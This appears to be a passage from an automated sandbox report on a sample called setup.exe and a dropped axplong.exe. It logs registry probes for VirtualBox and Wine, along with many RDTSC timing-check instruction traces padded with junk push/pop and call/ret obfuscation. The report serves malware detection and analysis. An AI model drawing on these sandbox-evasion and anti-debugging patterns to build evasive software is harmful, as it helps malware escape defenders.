                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77A9E second address: E77AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DCFh 0x00000009 js 00007FE0B4F44DC6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77AB7 second address: E77AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77AC1 second address: E77ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE0B4F44DC6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77ACB second address: E77ADF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77ADF second address: E77AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77AE3 second address: E77AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77AE9 second address: E77AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7801D second address: E78021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E78021 second address: E78052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD3h 0x00000007 pushad 0x00000008 jmp 00007FE0B4F44DD7h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E78052 second address: E78058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E782EA second address: E78309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FE0B4F44DC6h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E79E76 second address: E79E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E79F53 second address: E79F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E79F57 second address: E79F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A043 second address: E7A049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A049 second address: E7A04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A5C9 second address: E7A5D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE0B4F44DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A5D3 second address: E7A5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A5D9 second address: E7A5DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A7C6 second address: E7A7E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7AE9D second address: E7AF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FE0B4F44DC8h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FE0B4F44DCEh 0x00000016 nop 0x00000017 mov edi, 5D98FFADh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FE0B4F44DC8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D1E14h], esi 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 jmp 00007FE0B4F44DCCh 0x00000047 jp 00007FE0B4F44DCCh 0x0000004d jnc 00007FE0B4F44DC6h 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7B954 second address: E7B958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7B958 second address: E7B95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7B95C second address: E7B962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7C8F5 second address: E7C90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE0B4F44DD0h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7D412 second address: E7D418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7D1D3 second address: E7D1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7EB1F second address: E7EB88 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FE0B4522B18h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FE0B4522B18h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov esi, 5F741A67h 0x00000046 push 00000000h 0x00000048 pushad 0x00000049 sub dx, 3DC2h 0x0000004e or ecx, dword ptr [ebp+1247ABB6h] 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7DE01 second address: E7DE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7E869 second address: E7E86F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7EB88 second address: E7EB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7DE05 second address: E7DE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7F65C second address: E7F660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7F364 second address: E7F368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8469E second address: E846C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FE0B4F44DD8h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E846C1 second address: E846D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4522B21h 0x00000009 pop ecx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E846D7 second address: E846E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E393B9 second address: E393BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E393BF second address: E393E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FE0B4F44DCEh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E86D3B second address: E86D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E86D3F second address: E86D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE0B4F44DC6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8AFA1 second address: E8AFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8AFA7 second address: E8B000 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE0B4F44DD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FE0B4F44DC8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b jbe 00007FE0B4F44DCBh 0x00000031 mov edi, 2B6E0E33h 0x00000036 mov edi, dword ptr [ebp+12487F5Eh] 0x0000003c push eax 0x0000003d push esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8905A second address: E89068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FE0B4522B16h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8A07E second address: E8A082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8B22F second address: E8B234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8F686 second address: E8F6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FE0B4F44DC8h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E90628 second address: E9068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FE0B4522B18h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D2603h], esi 0x0000002a mov bx, dx 0x0000002d push 00000000h 0x0000002f adc edi, 7F828764h 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D28EBh] 0x0000003d xchg eax, esi 0x0000003e jmp 00007FE0B4522B1Bh 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9165A second address: E9165F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9165F second address: E91669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE0B4522B16h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4349A second address: E434B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE0B4F44DC6h 0x0000000a jmp 00007FE0B4F44DD3h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E434B7 second address: E434BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E434BB second address: E434E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007FE0B4F44DE1h 0x00000016 push ecx 0x00000017 push edx 0x00000018 pop edx 0x00000019 jmp 00007FE0B4F44DCFh 0x0000001e pop ecx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E94A14 second address: E94A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4522B27h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E94A30 second address: E94A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E94A3D second address: E94A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E917DC second address: E917E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E917E1 second address: E91804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4522B28h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E91804 second address: E91808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E971EE second address: E971F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E91808 second address: E9189B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FE0B4F44DCCh 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f mov ebx, dword ptr [ebp+122D38AEh] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov ebx, dword ptr [ebp+122D3992h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FE0B4F44DC8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D1195h] 0x00000049 je 00007FE0B4F44DCCh 0x0000004f mov edi, dword ptr [ebp+122D3ADEh] 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007FE0B4F44DC8h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 jmp 00007FE0B4F44DCCh 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9189B second address: E918A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE0B4522B16h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9086C second address: E90873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E90873 second address: E90878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9911F second address: E99148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FE0B4F44DCCh 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E99148 second address: E991A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE0B4522B1Eh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, 10AE5533h 0x00000011 mov bx, B0ECh 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D1E39h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FE0B4522B18h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b push ecx 0x0000003c pushad 0x0000003d popad 0x0000003e pop ecx 0x0000003f jmp 00007FE0B4522B21h 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E991A9 second address: E991C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FE0B4F44DCFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9730C second address: E97310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E97310 second address: E97314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E97314 second address: E9731A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9731A second address: E973BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE0B4F44DC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FE0B4F44DC8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e cld 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FE0B4F44DC8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov ebx, esi 0x00000052 mov ebx, 7AC4747Dh 0x00000057 mov eax, dword ptr [ebp+122D1759h] 0x0000005d cmc 0x0000005e push FFFFFFFFh 0x00000060 jmp 00007FE0B4F44DCFh 0x00000065 nop 0x00000066 pushad 0x00000067 jnp 00007FE0B4F44DCCh 0x0000006d je 00007FE0B4F44DCCh 0x00000073 je 00007FE0B4F44DC6h 0x00000079 popad 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jc 00007FE0B4F44DC8h 0x00000083 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E973BE second address: E973D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4522B21h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E973D3 second address: E973D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9E40E second address: E9E42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4522B28h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9E42C second address: E9E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE0B4F44DCEh 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3E469 second address: E3E470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3E470 second address: E3E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3E47B second address: E3E47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA21BD second address: EA21C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA68FF second address: EA6909 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE0B4522B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE6B45 second address: EE6B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE6B4C second address: EE6B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE6B5F second address: EE6B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE6B63 second address: EE6B6D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE0B4522B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9AAB second address: EE9AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
